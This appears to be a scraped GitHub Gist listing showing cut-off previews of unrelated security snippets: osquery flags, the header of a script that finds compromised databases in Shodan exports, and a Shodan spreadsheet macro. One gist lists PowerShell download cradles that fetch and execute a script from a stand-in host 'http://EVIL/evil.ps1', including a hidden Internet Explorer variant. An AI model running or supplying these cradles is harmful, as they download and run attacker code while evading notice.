This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --allow_unsafe | |
| --audit_allow_config=true | |
| --audit_allow_sockets=true | |
| --audit_persist=true | |
| --disable_audit=false | |
| --events_expiry=1 | |
| --events_max=50000 | |
| --logger_plugin=filesystem | |
| --disable_events=false | |
| --config_path=/var/osquery/osquery.conf |
n0x08
/ findPwnedDB.py
Last active
February 25, 2021 11:18
Find compromised NoSQL & Docker systems from Shodan JSON export
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # findPwnedDB.py | |
| # | |
| # Last update: 1/13/2020 | |
| # | |
| # Added: | |
| # CassandraDB support | |
| # Additional DBs | |
| # Docker XMR mining flags (Thanks Unit42!) | |
| # https://unit42.paloaltonetworks.com/graboid-first-ever-cryptojacking-worm-found-in-images-on-docker-hub/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
achillean
/ gist:5128200
Created
March 10, 2013 11:14
Shodan macro for Google Spreadsheets. To use this go to Tools -> Script Editor, then copy/ paste the code. In the spreadsheet you can then do =SHODAN("cisco-ios")
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Search the Shodan database using the given query. Returns the number of matches. | |
| */ | |
| function SHODAN(query) { | |
| var API_KEY = 'YOUR API KEY'; | |
| var url = 'http://www.shodanhq.com/api/count?key=' + API_KEY + '&q=' + query; | |
| var response = UrlFetchApp.fetch(url); | |
| var data = Utilities.jsonParse(response.getContentText()); | |